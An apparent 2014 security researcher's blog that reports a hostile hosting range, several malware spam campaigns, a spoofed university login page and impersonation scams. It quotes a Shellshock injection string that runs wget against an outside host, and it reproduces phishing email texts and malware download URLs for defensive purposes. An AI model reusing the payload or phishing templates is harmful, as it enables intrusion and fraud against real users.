Sponsored by..

Sunday, 28 September 2014

Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24

I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
ad.dipaz.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range, registered to:

inetnum:        83.166.234.0 - 83.166.234.255
netname:        MangoHost-Net
descr:          S.R.L. MangoHost Network
descr:          str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country:        MD
org:            ORG-SMN4-RIPE
admin-c:        VL6476-RIPE
tech-c:         VL6476-RIPE
status:         ASSIGNED PA
mnt-by:         RIM2000-MNT
notify:         noc@rim2000.ru
changed:        lukina@rim2000.ru 20140318
changed:        lukina@rim2000.ru 20140325
source:         RIPE

organisation:   ORG-SMN4-RIPE
org-name:       S.R.L. MangoHost Network
org-type:       OTHER
address:        str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail:         mangohostnetwork@gmail.com
abuse-c:        AR18923-RIPE
abuse-mailbox:  mangohostnetwork@gmail.com
mnt-ref:        CLOUDATAMD-MNT
mnt-by:         CLOUDATAMD-MNT
mnt-ref:        RIM2000-MNT
changed:        iuraqq@gmail.com 20140314
source:         RIPE

person:         Victor Letkovski
address:        T. Vladimirescu str 1/1 2024 Chisinau
phone:          +373 79 342393
nic-hdl:        VL6476-RIPE
mnt-by:         BSB-SERVICE-MNT
changed:        ripe@plusserver.de 20130520
source:         RIPE

% Information related to '83.166.234.0/24AS200019'

route:          83.166.234.0/24
descr:          S.R.L. MangoHost Network
origin:         AS200019
mnt-by:         RIM2000-MNT
changed:        lukina@rim2000.ru 20140319
source:         RIPE


MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.

Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).

Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:

for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com

I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.

Friday, 26 September 2014

Malware spam: "HMRC taxes application with reference" / "Important - BT Digital File" / RBS "Outstanding invoice"

Another bunch of spam emails, with the same payload at this earlier spam run.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received

From:     noreply@taxreg.hmrc.gov.uk [noreply@taxreg.hmrc.gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received

The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.

Please download/view your HMRC documents here: http://motobrothers.com.pl/documents/document26092014-008.php

The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

Important - BT Digital File


From:     Cory Sylvester [Cory.Sylvester@bt.com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File

Dear Customer,

This email contains your BT Digital File. Please scan attached file and reply to this email.

To download your BT Digital File please follow the link below : http://splash.com.my/documents/document26092014-008.php

If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 0346* between 8am and midnight.

Thank you for choosing BT Digital Vault.

Kind regards,
BT Digital Vault Team
footer

*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.

Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.

This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.

Registered office: 81 Newgate Street London EC1A 7AJ Registered in England no: 1800000

RBS Bankline: Outstanding invoice


From:     Bankline.Administrator@rbs.co.uk [Bankline.Administrator@rbs.co.uk]
To:     redacted.uk
Date:     26 September 2014 13:05
Subject:     Outstanding invoice

   {_BODY_TXT}

Dear [redacted],

Please find the attached copy invoice which is showing as unpaid on our ledger.

To download your invoice please click here

I would be grateful if you could look into this matter and advise on an expected payment date .

Many thanks

Paul Hamilton

Credit Control

Tel: 0845 300 2952
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload as earlier.

The links I have seen so far in the emails are:

http://motobrothers.com.pl/documents/document26092014-008.php
http://splash.com.my/documents/document26092014-008.php
http://www.firstlcoc.org/documents/document26092014-008.php
http://elblogderosner.com/documents/document26092014-008.php

Malware spam: "Employee Documents - Internal Use" / "You have a new voice" / "BACS Transfer : Remittance for JSAG244GBP" / "New Fax"

Whoever is running this spam run is evolving it day after day, with different types of spam to increase clickthrough rates and now some tricky tools to prevent analysis of the malware.

Employee Documents - Internal Use

From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use

DOCUMENT NOTIFICATION, Powered by NetDocuments

DOCUMENT NAME: Employee Documents

DOCUMENT LINK: http://iqmaintenance.com.au/Documents/document26092014-20.pdf

Documents are encrypted in transit and store in a secure repository

---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential. If you received this transmission in error, please notify the sender by reply email and delete the message and any attachments.

You have a new voice

From:     Voice Mail [Voice.Mail@victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice

You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.

* The reference number for this message is _qvs4004011004_001

The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E

To download and listen your voice mail please follow the link below: http://www.sjorg.com/Documents/voice26092014-18

The link to this secure message will expire in 24 hours. If you would like to save a copy of the email or attachment, please save from the opened encrypted email. If an attachment is included, you will be given the option to download a copy of the attachment to your computer.

RBS: BACS Transfer : Remittance for JSAG244GBP

From:     Douglas Byers [creditdepart@rbs.co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP

We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link below:

http://plugdeals.com/Documents/payment26092014-15

New Fax

From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax

You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here : http://montfort.dk/Documents/faxmessage26092014-16
The links in the emails I have seen go to the following locations (there are probably many, many more):

http://plugdeals.com/Documents/payment26092014-15
http://iqmaintenance.com.au/Documents/document26092014-20.pdf
http://www.sjorg.com/Documents/voice26092014-18
http://montfort.dk/Documents/faxmessage26092014-16


The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block.

A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.

The landing page script looks like this [pastebin] which is a bit harder to deal with, but nonetheless an malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55. The Anubis report shows the malware attempting to phone home to padav.com which is probably worth blocking.

Thursday, 25 September 2014

Malware spam: RBS "BACS Transfer" / Sage "Outdated Invoice" / Lloyds "Important - Commercial Documents" / NatWest "Important - New account invoice"

There seems to be a very aggressive spam run this morning, with at least four different email formats pushing the same malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"

From:     Riley Crabtree [creditdepart@rbs.co.uk]
Date:     25 September 2014 10:58
Subject:     BACS Transfer : Remittance for JSAG814GBP

We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link below:

http://shetabweb.com/bvqsyphiwq/cdddcetuex.html

Sage Account & Payroll: "Outdated Invoice"

From:     Sage Account & Payroll [invoice@sage.com]
Date:     25 September 2014 10:53
Subject:     Outdated Invoice

Sage Account & Payroll

You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:

https://invoice.sage.co.uk/Account?928143=Invoice_092514.zip

If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.

The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.

We have communicated this information with users as well, and we will continue to communicate with you through email as your transition continues.

This email was sent to: [redacted]

This email was sent by: Sage UK Limited
NC1-002-08-25, Newcastle upon Tyne., North Park, NE13 9AA, United Kingdom

Privacy and Security
Keeping your financial information secure is one of our most important responsibilities. For an explanation of how we manage customer information, please read our Privacy Policy. You can also learn how Sage UK Limited keeps your personal information secure and how you can help protect yourself.

Lloyds Commercial Bank: "Important - Commercial Documents"

From:     Lloyds Commercial Bank [secure@lloydsbank.com]
Date:     25 September 2014 11:36
Subject:     Important - Commercial Documents

Important account documents

Reference: C400
Case number: 05363392
Please review BACs documents.

Click link below, download and open document. (PDF Adobe file)
----------------------
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
-----------------------

Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .

Yours faithfully

James Vance
Senior Manager, Lloyds Commercial Banking

Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.

Please remember we guarantee the security of messages sent by email. 

NatWest Invoice: "Important - New account invoice

From:     NatWest Invoice [invoice@natwest.com]
Date:     25 September 2014 10:28
Subject:     Important - New account invoice

Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below :

https://www.nwolb.com/ServiceManagement/InvoicePageNoMenu.aspx?InvoiceCode=Invoice_232449


Thank you for choosing NatWest.

Important: Please do not respond to this message. It comes from an unattended mailbox.


This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

The Royal Bank of Scotland International Limited trading as NatWest (NatWest). Registered Office: P.O. Box 64, Royal Bank House, 71 Bath Street, St. Helier, Jersey JE4 8PJ. Regulated by the Jersey Financial Services Commission.
The links in the emails go to different download locations to make it harder to block:

http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
http://convergika.com/atlbhffykf/rdtlixjoot.html
http://calastargate.net/iqfhtfqinv/ybzhlpbjkh.html
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html


There are probably many, many more locations. In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file.

This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54. The Anubis report shows that it phones home to ukrchina-logistics.com which is probably worth blocking or monitoring access to.


Wednesday, 24 September 2014

More spam from the "Institute of Project Management America" (instituteofprojectmanagementamerica.org)

I've been on the case of the individuals spamming for IPMA (and before that NAPPPA) for some time, but it is disappointing to see that they are still pushing their fake seminars such as this one..

From:     Institute of Project Management America [announcements@ipma8.org]
Date:     24 September 2014 06:36
Subject:     Project Management Masters Certification Program (October 28-31, 2014: University of Portland)
The Project Management Masters Certification Program will be offered October 28-31, 2014 in Portland, Oregon. Project management professionals, business and technology professionals, students, and educators are invited to register at the  Institute of Project Management America website here.

October 28-31, 2014
University of Portland
Portland, Oregon
 
The PMMC is designed for those seeking professional project management certification. It serves as both a thorough professional education and recognized certification. Those seeking additional credentials such as the PMP®/PgMP®, PMI-SP®, and PMI-RMP® will benefit from this dynamic and interactive work session, while those currently holding credentials will find the certification to be an enhancement as well as the most up to date advanced professional development.  

Project Management Masters Certification program provides 36 hours of project management education, meeting education requirements for both PMI's Certified Associate in Project Management (CAPM) ® and Project Management Professional (PMP) certifications. Additionally, the Master Certification provides 36 Professional Development Units (PDUs) for current holders of PMP®/PgMP®, PMI-SP®, and PMI-RMP® credentials.

The program meets the education requirement for all professional designations through the Project Management Institute and other professional agencies. Additionally, the program awards 3.6 Continuing Education Units (CEUs) upon request. 

Program Description
Our certificate program teaches technical and business professionals how to master the critical skills of project management techniques as part of their technical career development.

The skills developed in the Project Management Masters Certification program apply to large and small projects, product design and development efforts, construction projects, IT projects, software development, and any project with critical performance, time, and budget targets.  

Our approach to project management education offers proven, results-focused learning.

Courses are developed and facilitated by professional subject experts with extensive industrial experience. Course emphasis is on providing practical skills and tools supported by relevant case examples.

Tuition

Tuition for the four-day Project Management Masters Certification program is $995.00

Program Schedule and Content
1. Project Initiation, Costing, and Selection, Day 1
2. Project Organization and Leadership, Day 2 
3. Detailed Project Planning, Day 2 and 3 
4. Project Monitoring and Control, Day 3 and 4 
5. Project Risk Management, Day 4  

Benefits
·   A PMMC certificate of accomplishment is awarded upon completion of the four day program of five courses. Completion letters are given for each course.
·   Our instructors have extensive industrial experience. They focus on providing you with practical skills and tools using relevant case examples.
·   Each class is highly focused and promotes maximum interaction.
·   You can network with other project management professionals from a variety of industries.
·   Earn Professional Development Units (PDUs) for maintenance of certification under the PMI Continuing Certification Requirements Program.
·    Applicants for PMI's Certified Associate in Project Management (CAPM)® and Project Management Professional (PMP) certifications will have met all education requirements for eligibility.

Registration

Participants may reserve a seat online at the Institute of Project Management America website, by calling the Program Office toll-free at (888) 859-5659, or by sending their name and contact information via email the Program Registrar .

Upon receiving your registration, a confirmation email is sent to registrants that include session site information, travel information, program description, and details on how to confirm attendance and make payment arrangements.

Click HERE to unsubscribe from this mailing list. 

 
The people who run this have a very poor reputation for both the quality of the courses and not paying monies owed. Often they claim that the course is being run at a prestigious location, but at the last moment the venue changes to somewhere a lot cheaper. The last spam I received advertising a course at Seattle Public Library in August attracted this comment:
As the person who helps run the calendar at Seattle Public Library, I can assure you that they do not have space secured here for their "training". They never returned the contract or payment.
In this case the spam originates from 173.55.195.165 (a Verizon customer in Hacienda Heights, California) using a "from" address of announcements@ipma8.org and spamvertising the domain instituteofprojectmanagementamerica.org

The following IPs and domains are all connected to this spam run:
91.236.75.132
104.128.224.126
104.128.225.55
172.245.33.189
grantfundingusa.org
instituteofprojectmanagementamerica.org
ipma2014.org
projectmanagementusa.org
ipma2.org
ipma3.org
ipma5.org
ipma6.org
ipma7.org
ipma8.org
ipma9.org
ipma10.org
ipma11.org
ipma12.org

My personal belief is that this so-called Institute is a complete scam and it should be avoided.

"You have received a new secure message from BankLine" spam leads to undetected malware

This fake BankLine email leads to malware that is not currently detected by any anti-virus engine:

From:     Bankline [secure.message@bankline.com]
Date:     24 September 2014 09:59
Subject:     You have received a new secure message from BankLine

You have received a secure message.

Read your secure message by following the link bellow:

http://ismashahalam.net/xyzpayohjx/ngkzoeqjjs.html

You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.

If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 7941.

First time users - will need to register after opening the attachment.
About Email Encryption - https://supportcentre.Bankline.com/app/answers/detail/a_id/1671/kw/secure%20message 
The link in the email goes to ismashahalam.net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam.net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50.

The Anubis report shows that the malware phones home to very-english.co.uk which is worth blocking or monitoring.

For research purposes only, a copy of the malicious executable can be downloaded from here [zip]. The password is foray307.

Tuesday, 23 September 2014

Malicious "Employee Documents - Internal Use" spam spoofs victim's domain

This spam appears to come from the victim's own domain, but in fact doesn't and it leads to malware instead.
From:     victimdomain.com [INTERNAL@victimdomain.com]
To:     victim@victimdomain.com
Date:     23 September 2014 11:43
Subject:     Employee Documents - Internal Use

DOCUMENT NOTIFICATION, Powered by NetDocuments

DOCUMENT NAME: Employee Documents

DOCUMENT LINK: http://cystersi.wagrowiec.pl/bitusagezp/paqzdzsfjs.html

Documents are encrypted in transit and store in a secure repository

---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential. If you received this transmission in error, please notify the sender by reply email and delete the message and any attachments.
In this case the link goes to cystersi.wagrowiec.pl/bitusagezp/paqzdzsfjs.html and then downloads a file from cystersi.wagrowiec.pl/bitusagezp/EmployeeDocuments.zip which unzips to a malicious executable EmployeeDocuments.scr. This is exactly the same payload as found in this spam run earlier today.

According to this spam.. "You have a new voice". Really?

This strangely titled spam leads to malware.

From:     Voice Mail
Date:     23 September 2014 10:17
Subject:     You have a new voice

You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.

* The reference number for this message is _qvs8213783583_001

The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH

To download and listen your voice mail please follow the link below: http://www.ezysoft.in/ocjnvzulsx/begmnbjiae.html

The link to this secure message will expire in 24 hours. If you would like to save a copy of the email or attachment, please save from the opened encrypted email. If an attachment is included, you will be given the option to download a copy of the attachment to your computer.
Hang on.. cough cough.. la la la la la la.. testing testing. Nope, my voice sounds pretty much the same as it usually does.

The link in the email downloads a file from www.ezysoft.in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54.

According to this Anubis report the malware attempts to phone home to very-english.co.uk which might be worth blocking.

Monday, 22 September 2014

"Your online Gateway.gov.uk Submission" spam

This fake spam from the UK Government Gateway leads to malware:

From:     Gateway.gov.uk
Date:     22 September 2014 12:54
Subject:     Your online Gateway.gov.uk Submission


Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window

The best place to find government services and information

The link in the email does not go to gateway.gov.uk at all, but in this case the the link goes to the following:
http://maedarchitettura.it/wfntvkppqi/wnazvamlzv.html ->
http://www.maedarchitettura.it/wfntvkppqi/wnazvamlzv.html ->
http://maedarchitettura.it/wfntvkppqi/GatewaySubmission.zip

The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55. The Anubis report shows that it attempts to make a connection to ruralcostarica.com which is probably worth blocking.

Lena Michalczyk STE LTD "documents" spam

This spam message does not come from STE UK Ltd or any company of a similar name, not does it come from anyone called Lena Michalczyk. In the sample I received, it actually originated from a hacked machine located in the Federated States of Micronesia.

From:     lena michalczyk [michalczyklena@gmail.com]
Date:     22 September 2014 10:01
Subject:     documents

--
Regards Lena Michalczyk STE LTD.
office no. 07999258583

--
Regards Lena Michalczyk STE LTD.
office no. 07999258583
In the same I saw, the attached file was block20140915_16321753.pdf.zip but the attachment itself was corrupt, however there's a good chance that the spammers will fix this and send it out with a working payload.

If you receive a message like this, simply delete it and do not open the attachment.

Sunday, 21 September 2014

Why is Mobiquant pretending to be Southampton Solent University?

I wrote about the French (or possibly Moroccan) IT security firm Mobiquant Technologies last year when their website was serving up an exploit kit, and they failed to respond to any attempts at communicating with them. Eventually (after several weeks) they woke up and fixed the problem, and then proceeded to mount a bizarre and highly personal attack on me.

I've kept a bit of an eye on them since then as there are several things that don't add up. One of them is an a website they are running at mobiquantacademy.com. For some reason I cannot fathom, it appears to have been set up to spoof a site belonging to Southampton Solent University, an organisation that they do not seem to be affiliated with in any way.




It isn't a copy of the current Solent myCourse site, it seems to be a couple of years old. So a copy, not a mirror or anything.

The Mobiquant site prominently displays a login box:


A look at the HTML source [pastebin] shows that although there are plenty of references back to the solent.ac.uk domain, the part that handles processing the login is very much on the mobiquantacademy.com domain.

<form action="http://www.mobiquantacademy.com/login/index.php" method="post" id="login"  >
  <div class="loginform">
    <div class="form-label"><label for="username">Username</label></div>
    <div class="form-input">
      <input type="text" name="username" id="username" size="15" value="" />
    </div>
    <div class="clearer"><!-- --></div>
    <div class="form-label"><label for="password">Password</label></div>
    <div class="form-input">
      <input type="password" name="password" id="password" size="15" value=""  />
      <input type="submit" id="loginbtn" value="Log in" />
    </div>
  </div>
    <div class="clearer"><!-- --></div>
    <div class="rememberpass">
  <input type="checkbox" name="rememberusername" id="rememberusername" value="1"  />
  <label for="rememberusername">Remember username</label>
      </div>
<div class="clearer"><!-- --></div>
  <div class="forgetpass"><a href="forgot_password.php">Forgotten your username or password?</a></div>
</form>


So, if a student found this site somehow and typed in their credentials, then they would be processed by a PHP scripts on the mobiquantacademy.com site. That's a bit peculiar, isn't it? You might think that this was a security risk, which is an odd thing for an IT security firm to be doing.

So perhaps this is some sort of configuration error? I have certainly seen cases where misconfigured webservers serve up the wrong website. Well, there are several reasons why this isn't the case.. Solent host their websites in their own IP address range of 194.81.144.0 - 194.81.159.255, www.mobiquantacademy.com is hiding behind a Cloudflare IP address but plain old mobiquantacademy.com (without the www) is hosted on the real IP address of 192.163.241.167 which also contains a number of sites that clearly link the domain with Mobiquant.

mseclabs.com
mail.mseclabs.com
secotnow.com
tripteek.com
clouderya.com
djmisterz.com
mail.djmisterz.com
mobiquant.com
www.mobiquant.com
mail.mobiquant.com
com1agency.com
mobiquantacademy.com
mobilesecurityfirst.com
ns1.mobilesecurityfirst.com
ns2.mobilesecurityfirst.com
securityinternetofthings.com


As I found before with Mobiquant's main mobiquant.com domain, the WHOIS details for mobiquantacademy.com are completely fake.

Registrant Name: ALEXANDRA MEYER
Registrant Organization: FORTESIA
Registrant Street: 33
Registrant Street: KNIGHTSBRIDGE RD
Registrant City: PISCATAWAY
Registrant State/Province: NJ
Registrant Postal Code: 08854
Registrant Country: US
Registrant Phone: +1.3477481090
Registrant Phone Ext:
Registrant Fax: +1.5555555555
Registrant Fax Ext:
Registrant Email: adds31@gmail.com
Registry Admin ID: 


This isn't the first set of fake WHOIS details they have supplied for the domain. When I complained to their registrar and host that they were using fake details, they briefly removed the spoof Solent site and changed their WHOIS details from:

Registry Registrant ID:
Registrant Name: INTERNET GROUP
Registrant Organization: HOSTING JEWEL
Registrant Street: 7
Registrant Street: CHEVAL PLACE
Registrant City: LONDON
Registrant State/Province: LD
Registrant Postal Code: S6SDJ7
Registrant Country: GB
Registrant Phone: +44.2077776588
Registrant Phone Ext:
Registrant Fax: +1.5555555555
Registrant Fax Ext:
Registrant Email: ADDS31@GMAIL.COM
Registry Admin ID: 


The fact that the spoof Solent site was removed and then re-added looks rather strange in my personal opinion. Namecheap (the registrar) confirmed that the content had been removed, but now it is back.

Another thing that makes this look like a deliberate act is the way that the mobiquantacademy.com website is explictly referred to in the HTML source code when it comes to the login handler which means that the code was altered deliberately. If the site had somehow been accidentally mirrored then it would not have that explicit reference.

Neither Mobiquant's websites or Solent's website has any reference to the other party. A Google search of the two parties does not show any relationship, apart from Mobiquant's copy of Solent's site. I cannot see any legitimate reason why Mobiquant would be running a site that was asking for the credentials of Solent students.

So what is this site for? I leave you to draw your own conclusions.

UPDATE: Mobiquant must be keeping track of my blog or my Tweets as they have now deleted the site.


However, if you wish to analyse a copy of the site yourself you can download a ZIPped copy from here.

Saturday, 20 September 2014

Scam: advocateforyouths.org is not the real Advocates for Youth (and other scam sites)

I've covered these scammers before - they rip off legitimate websites such as the genuine Advocates for Youth and use them to commit fraud. The domain advocateforyouths.org is currently being pushed by the bad guys, note that the legitimate domains is actually advocatesforyouth.org.

From:     advocates3@esecuredmails.eu
Date:     20 September 2014 00:52
Subject:     Re: Effects of Teenage Marriage
Signed by:     esecuredmails.eu

INTERNATIONAL YOUTH CONFERENCE ON “ EFFECTS OF TEENAGE MARRIAGE AND HIV/AIDS "  
   

Advocates for Youth and co-organizers of the 21st international NGO's & CBO's conference on community Development and Development Planning have the pleasure to invite Youth Organizations, Socio Cultural Organizations, Community Based Organizations (CBO) Scholars, Researchers, Health Organizations, Professionals, Business Organizations (NGOs) Religion Organizations, Human Right Organizations & Women Groups to the International Conference on"Effects of Teenage Marriage and HIV/AIDS " taking place from Thursday 20th - Friday 21st November 2014 in U.S.A and Monday 24th - Friday 28th November 2014 in The NETHERLANDS respectively.


This is the most important event in the framework of the fight to Educate the Youth on HIV/AIDS, Child Abuse, human and community development which will take place in Washington DC, United States of America from Thursday 20th - Friday 21st November 2014 in U.S.A and Monday 24th - Friday 28th November 2014 in The NETHERLANDS respectively.


Advocates for Youth is registered 501(c) Non profit international organization whose aims & objectives are to empower individuals and communities worldwide through offering grants for business, education, economic enhancement, community development and environmental conservation, to support groups and organizations addressing social issues, youth ad women empowerment, and a variety of philanthropic projects through grants to non-profit organization; to provide education & information with view of limiting abuse and child molestation, to support and advocate on behalf of those infected and affected by the menace or abuse and neglect to promote the well-being of mankind by empowering the capacity of charitable organization to provide effective programs of quality.


This conference will bring together 1026 representatives of NGOs/CBOs and numerous numbers of interested individual participants from all over the world. The conference will be conducted on participatory bases with satellite plenary and simultaneous sessions followed by general and small group discussions.

FINANCIAL SUPPORT: The conference receives financial support from CitiBank New York and United Nations Youth Commission etc. This sponsorship covers the following:


1. Return Airplane travel tickets for selected delegates from their home countries to venues of the event in Washington DC ( United States of America ) and The Hague City (The Netherlands), then back to their home countries.

2. Hotel accommodations in Washington DC ( United States ) only for selected delegates and their friends.

3. Medical insurance cover for delegates throughout the entire conference duration.

Advocates for Youth will not assume the responsibilities of any other costs other than those listed above.


NOMINATION & SELECTION OF PARTICIPANTS: Intending participants are requested to nominate between Five (5) to Ten (15) active members to participate. Participants should be from 14 years and above (Male or Female).

REGISTRATION PROCESS: To register to take part in this Conference, please request for the International Delegates Registration form and other conference information. The request for registration form and other conference information should be addressed to the Secretary:


Linara J. Davidson
Secretary, Advocates for youth
2000 M Street, NW Suite 750,
Washington DC 20036,
United States of America,
Tel: +1 202.600.9543
Fax: + 1 650.747.4401
Email: ljdavidson@advocateforyouths.org
Website: www.advocateforyouths.org 


While we anticipate your earliest response, you are advised to contact the Secretary by email and we look forward to meeting up with you and your group in Washington DC and The Hague City to assert a new change for a stronger society.


Announcer !!!


Debra Hauser
President, Advocates for youth,
Washington DC
U.S.A.
Email: debra.hauser@advocateforyouths.org

This email is a scam and is basically a way to defraud the potential victim of money by making them think that they are dealing with a real organisation. The websites referred to is an almost pixel-perfect copy of the real thing.


The differences are very subtle. Crucially the contact details between the fake and real sites are different, but the scammers have gone to the effort of acquiring a phone number in the same area code.

